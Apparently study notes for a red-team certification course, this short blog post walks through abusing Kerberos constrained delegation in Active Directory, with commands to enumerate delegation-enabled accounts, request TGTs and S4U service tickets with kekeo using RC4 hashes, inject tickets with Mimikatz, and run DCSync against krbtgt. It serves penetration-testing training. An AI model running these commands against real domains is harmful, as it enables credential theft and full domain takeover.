CRTP (Constrained-Delegation)
CRTP (Constrained-Delegation)
CRTP (Constrained-Delegation)
Constrained Delegation
Methodology/Steps
- List all the users having Constrained Delegation
- Keep a note of the msDS-AllowedToDelegateTo value
- Request for a TGT using the hash of the user with CD using kekeo (Which me must have collected before)
- Keep a note of the TGT return ticket
- Now request a TGS with the 2nd step and 4th step values as parameters in /service and /tgt
- Keep a note of the TGS return Ticket
- Now we can inject the TGS return Ticket with Inkove-Mimikatz
- We can now list the file systems of that account. Example :
ls \\dc-mysql\C$but can not use any WMI-Commands- But if the user DC we can do the same process and then do a DCSync attack
Enumerate users and computers with CD enabled
1
2
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
Requesting a TGT
1
2
tgt::ask /user:websvc /domain:domain.local /rc4:cc098f204c5887eaa8253e7c2749156f
tgt::ask /user:dcorp-adminsrv /domain:domain.local /rc4:1fadb1b13edbc5a61cbdc389e6f34c67
Request a TGS
1
2
tgs::s4u /tgt:TGT.kirbi /user:[email protected] /service:cifs/computer.domain.LOCAL
tgs::s4u /tgt:TGT.kirbi /user:[email protected] /service:time/computer.domain.LOCAL|ldap/computer.domain.LOCAL
Inject the ticket
1
Invoke-Mimikatz -Command '"kerberos::ptt TGS.kirbi"'
Execute DCSync
1
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
This post is licensed under
CC BY 4.0
by the author.